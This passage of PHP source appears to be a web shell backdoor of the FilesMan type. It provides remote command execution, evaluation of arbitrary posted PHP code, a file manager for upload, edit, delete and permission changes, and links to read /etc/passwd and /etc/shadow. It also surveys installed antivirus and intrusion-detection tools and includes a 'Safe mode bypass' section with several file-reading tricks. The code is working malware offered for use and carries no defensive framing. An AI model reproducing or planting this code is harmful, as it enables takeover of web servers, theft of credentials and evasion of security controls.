$menu = '';
foreach ($m as $k => $v) {
$menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
}
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach (range('a', 'z') as $drive) {
if (is_dir($drive . ':\\')) {
$drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
}
}
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd' . ($GLOBALS['os'] == 'win' ? '<br>Drives' : '') . '</span></td>' . '<td>:<nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://www.google.com/search?q=' . urlencode(@php_uname()) . '" target="_blank">[Google]</a> <a href="' . $millink . '" target=_blank>[milw0rm]</a></nobr><br>:' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>:' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=<?php echo $color?><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>:' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>:' . $cwd_links . ' ' . viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>:' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}
function printFooter()
{
$is_writable = is_writable($GLOBALS['cwd']) ? "<font color=green>[ Writeable ]</font>" : "<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
<tr>
<td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?php
echo htmlspecialchars($GLOBALS['cwd']);
?>"><input type=submit value=">>"></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
</tr>
<tr>
<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?php
echo $is_writable;
?></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?php
echo $is_writable;
?></td>
</tr>
<tr>
<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='<?php
echo htmlspecialchars($GLOBALS['cwd']);
?>'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='<?php
echo isset($_POST['charset']) ? $_POST['charset'] : '';
?>'>
<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?php
echo $is_writable;
?></td>
</tr>
</table>
</div>
</body></html>
<?php
}
if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) {
function posix_getpwuid($p)
{
return false;
}
}
if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) {
function posix_getgrgid($p)
{
return false;
}
}
function ex($in)
{
$out = '';
if (function_exists('exec')) {
@exec($in, $out);
$out = @join("\n", $out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
return $out;
}
function viewSize($s)
{
if ($s >= 1073741824) {
return sprintf('%1.2f', $s / 1073741824) . ' GB';
} elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB';
} elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB';
} else {
return $s . ' B';
}
}
function perms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
function viewPermsColor($f)
{
if (!@is_readable($f)) {
return '<font color=#FF0000><b>' . perms(@fileperms($f)) . '</b></font>';
} elseif (!@is_writable($f)) {
return '<font color=white><b>' . perms(@fileperms($f)) . '</b></font>';
} else {
return '<font color=#00BB00><b>' . perms(@fileperms($f)) . '</b></font>';
}
}
if (!function_exists("scandir")) {
function scandir($dir)
{
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function which($p)
{
$path = ex('which ' . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function actionSecInfo()
{
printHeader();
echo "<h1>Server security information</h1><div class=content>";
function showSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "\n") === false) {
echo $v . '<br>';
} else {
echo '<pre class=ml1>' . $v . '</pre>';
}
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
$temp = array();
if (function_exists('mysql_get_client_info')) {
$temp[] = "MySql (" . mysql_get_client_info() . ")";
}
if (function_exists('mssql_connect')) {
$temp[] = "MSSQL";
}
if (function_exists('pg_connect')) {
$temp[] = "PostgreSQL";
}
if (function_exists('oci_connect')) {
$temp[] = "Oracle";
}
showSecParam('Supported databases', implode(', ', $temp));
echo "<br>";
if ($GLOBALS['os'] == 'nix') {
$userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>" : 'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
echo "<br>";
$temp = array();
foreach ($userful as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam('Userful', implode(', ', $temp));
$temp = array();
foreach ($danger as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam('Danger', implode(', ', $temp));
$temp = array();
foreach ($downloaders as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam('Downloaders', implode(', ', $temp));
echo "<br/>";
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('HDD space', ex('df -h'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version', ex('ver'));
showSecParam('Account Settings', ex('net accounts'));
showSecParam('User Accounts', ex('net user'));
}
echo "</div>";
printFooter();
}
function actionPhp()
{
if (isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\x00") . "';\n";
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
echo "<h1>PHP info</h1><div class=content>";
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!body {.*}!msiU', '', $tmp);
$tmp = preg_replace('!a:\\w+ {.*}!msiU', '', $tmp);
$tmp = preg_replace('!h1!msiU', 'h2', $tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU', '', $tmp);
echo $tmp;
echo "</div><br>";
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
}
echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 ' . ($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
if (!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo "</pre></div>";
printFooter();
}
function actionFilesMan()
{
printHeader();
echo "<h1>File manager</h1><div class=content>";
if (isset($_POST['p1'])) {
switch ($_POST['p1']) {
case 'uploadFile':
if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) {
echo "Can't upload file!";
}
break;
case 'mkdir':
if (!@mkdir($_POST['p2'])) {
echo "Can't create new dir";
}
break;
case 'delete':
function deleteDir($path)
{
$path = substr($path, -1) == '/' ? $path : $path . '/';
$dh = opendir($path);
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (basename($item) == ".." || basename($item) == ".") {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
closedir($dh);
rmdir($path);
}
if (is_array(@$_POST['f'])) {
foreach ($_POST['f'] as $f) {
$f = urldecode($f);
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
}
}
break;
case 'paste':
if ($_SESSION['act'] == 'copy') {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste($c . $s . '/', $f, $d . $s . '/');
}
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION['f'] as $f) {
copy_paste($_SESSION['cwd'], $f, $GLOBALS['cwd']);
}
} elseif ($_SESSION['act'] == 'move') {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste($c . $s . '/', $f, $d . $s . '/');
}
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION['f'] as $f) {
@rename($_SESSION['cwd'] . $f, $GLOBALS['cwd'] . $f);
}
}
unset($_SESSION['f']);
break;
default:
if (!empty($_POST['p1']) && ($_POST['p1'] == 'copy' || $_POST['p1'] == 'move')) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach ($_SESSION['f'] as $k => $f) {
$_SESSION['f'][$k] = urldecode($f);
}
$_SESSION['cwd'] = @$_POST['c'];
}
break;
}
echo "<script>document.mf.p1.value=\"\";document.mf.p2.value=\"\";</script>";
}
$dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
if ($dirContent === false) {
echo "Can't open this folder!";
return;
}
global $sort;
$sort = array('name', 1);
if (!empty($_POST['p1'])) {
if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) {
$sort = array($match[1], (int) $match[2]);
}
}
?>
<script>
function sa() {
for(i=0;i<document.files.elements.length;i++)
if(document.files.elements[i].type == 'checkbox')
document.files.elements[i].checked = document.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = $links = array();
$n = count($dirContent);
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) {
$files[] = array_merge($tmp, array('type' => 'file'));
} elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) {
$links[] = array_merge($tmp, array('type' => 'link'));
} elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && $dirContent[$i] != ".") {
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b)
{
if ($GLOBALS['sort'][0] != 'size') {
return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]]) * ($GLOBALS['sort'][1] ? 1 : -1);
} else {
return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
}
}
usort($files, "cmp");
usort($dirs, "cmp");
usort($links, "cmp");
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach ($files as $f) {
echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');"><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? viewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
$l = $l ? 0 : 1;
}
?>
<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='<?php
echo htmlspecialchars($GLOBALS['cwd']);
?>'>
<input type=hidden name=charset value='<?php
echo isset($_POST['charset']) ? $_POST['charset'] : '';
?>'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php
if (!empty($_SESSION['act']) && @count($_SESSION['f'])) {
?><option value='paste'>Paste</option><?php
}
?></select> <input type="submit" value=">>"></td></tr>
</form></table></div>
<?php
printFooter();
}
function actionStringTools()
{
if (!function_exists('hex2bin')) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
if (!function_exists('hex2ascii')) {
function hex2ascii($p)
{
$r = '';
for ($i = 0; $i < strLen($p); $i += 2) {
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
}
return $r;
}
}
if (!function_exists('ascii2hex')) {
function ascii2hex($p)
{
$r = '';
for ($i = 0; $i < strlen($p); ++$i) {
$r .= dechex(ord($p[$i]));
}
return strtoupper($r);
}
}
if (!function_exists('full_urlencode')) {
function full_urlencode($p)
{
$r = '';
for ($i = 0; $i < strlen($p); ++$i) {
$r .= '%' . dechex(ord($p[$i]));
}
return strtoupper($r);
}
}
if (isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
ob_start();
if (function_exists($_POST['p1'])) {
echo $_POST['p1']($_POST['p2']);
}
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\x00") . "';\n";
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
echo "<h1>String conversions</h1><div class=content>";
$stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen');
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
}
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach ($stringTools as $k => $v) {
echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
}
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . ($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . htmlspecialchars(@$_POST['p2']) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
if (!empty($_POST['p1'])) {
if (function_exists($_POST['p1'])) {
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
}
echo "</pre></div>";
?>
<br><h1>Search for hash:</h1><div class=content>
<form method='post' target='_blank' name="hf">
<input type="text" name="hash" style="width:200px;"><br>
<input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
<input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br>
<input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
<input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
<input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>
</form>
</div>
<?php
printFooter();
}
function actionFilesTools()
{
if (isset($_POST['p1'])) {
$_POST['p1'] = urldecode($_POST['p1']);
}
if (@$_POST['p2'] == 'download') {
if (is_file($_POST['p1']) && is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
}
$fp = @fopen($_POST['p1'], "r");
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
} elseif (is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
}
exit;
}
if (@$_POST['p2'] == 'mkfile') {
if (!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
printHeader();
echo "<h1>File tools</h1><div class=content>";
if (!file_exists(@$_POST['p1'])) {
echo "File not exists";
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo '<span>Name:</span> ' . htmlspecialchars($_POST['p1']) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? viewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . viewPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
echo '<span>Create time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
if (empty($_POST['p2'])) {
$_POST['p2'] = 'view';
}
if (is_file($_POST['p1'])) {
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
} else {
$m = array('Chmod', 'Rename', 'Touch');
}
foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,null,\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
}
echo "<br><br>";
switch ($_POST['p2']) {
case 'view':
echo "<pre class=ml1>";
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo "</pre>";
break;
case 'highlight':
if (is_readable($_POST['p1'])) {
echo "<div class=ml1 style=\"background-color: #e1e1e1;color:black;\">";
$code = highlight_file($_POST['p1'], true);
echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
}
break;
case 'chmod':
if (!empty($_POST['p3'])) {
$perms = 0;
for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i) {
$perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1);
}
if (!@chmod($_POST['p1'], $perms)) {
echo "Can't set permissions!<br><script>document.mf.p3.value=\"\";</script>";
} else {
die('<script>g(null,null,null,null,"")</script>');
}
}
echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
break;
case 'edit':
if (!is_writable($_POST['p1'])) {
echo "File isn't writeable";
break;
}
if (!empty($_POST['p3'])) {
@file_put_contents($_POST['p1'], $_POST['p3']);
echo "Saved!<br><script>document.mf.p3.value=\"\";</script>";
}
echo "<form onsubmit=\"g(null,null,null,null,this.text.value);return false;\"><textarea name=text class=bigarea>";
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo "</textarea><input type=submit value=\">>\"></form>";
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>', '', '');
$len = strlen($c);
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
switch (ord($c[$i])) {
case 0:
$h[2] .= ' ';
break;
case 9:
$h[2] .= ' ';
break;
case 10:
$h[2] .= ' ';
break;
case 13:
$h[2] .= ' ';
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0] .= sprintf('%08X', $i + 1) . '<br>';
}
$h[1] .= '<br>';
$h[2] .= "\n";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
break;
case 'rename':
if (!empty($_POST['p3'])) {
if (!@rename($_POST['p1'], $_POST['p3'])) {
echo "Can't rename!<br><script>document.mf.p3.value=\"\";</script>";
} else {
die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
}
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
break;
case 'touch':
if (!empty($_POST['p3'])) {
$time = strtotime($_POST['p3']);
if ($time) {
if (@touch($_POST['p1'], $time, $time)) {
die('<script>g(null,null,null,null,"")</script>');
} else {
echo "Fail!<script>document.mf.p3.value=\"\";</script>";
}
} else {
echo "Bad time format!<script>document.mf.p3.value=\"\";</script>";
}
}
echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
break;
case 'mkfile':
break;
}
echo "</div>";
printFooter();
}
function actionSafeMode()
{
$temp = '';
ob_start();
switch ($_POST['p1']) {
case 1:
$temp = @tempnam($test, 'cx');
if (@copy("compress.zlib://" . $_POST['p2'], $temp)) {
echo @file_get_contents($temp);
unlink($temp);
} else {
echo "Sorry... Can't open file";
}
break;
case 2:
$files = glob($_POST['p2'] . '*');
if (is_array($files)) {
foreach ($files as $filename) {
echo $filename . "\n";
}
}
break;
case 3:
$ch = curl_init("file://" . $_POST['p2'] . "\x00" . SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include $_POST['p2'];
break;
case 5:
for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++) {
$uid = @posix_getpwuid($_POST['p2']);
if ($uid) {
echo join(':', $uid) . "\n";
}
}
break;
case 6:
if (!function_exists('imap_open')) {
break;
}
$stream = imap_open($_POST['p2'], "", "");
if ($stream == FALSE) {
break;
}
echo imap_body($stream, 1);
imap_close($stream);
break;
}
$temp = ob_get_clean();
printHeader();
echo "<h1>Safe mode bypass</h1><div class=content>";
echo "<span>Copy (read file)</span><form onsubmit='g(null,null,\"1\",this.param.value);return false;'><input type=text name=param><input type=submit value=\">>\"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,\"2\",this.param.value);return false;'><input type=text name=param><input type=submit value=\">>\"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,\"3\",this.param.value);return false;'><input type=text name=param><input type=submit value=\">>\"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,\"4\",this.param.value);return false;'><input type=text name=param><input type=submit value=\">>\"></form><br><span>Posix_getpwuid (\"Read\" /etc/passwd)</span><table><form onsubmit='g(null,null,\"5\",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=\">>\"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,\"6\",this.param.value);return false;'><input type=text name=param><input type=submit value=\">>\"></form>";
if ($temp) {
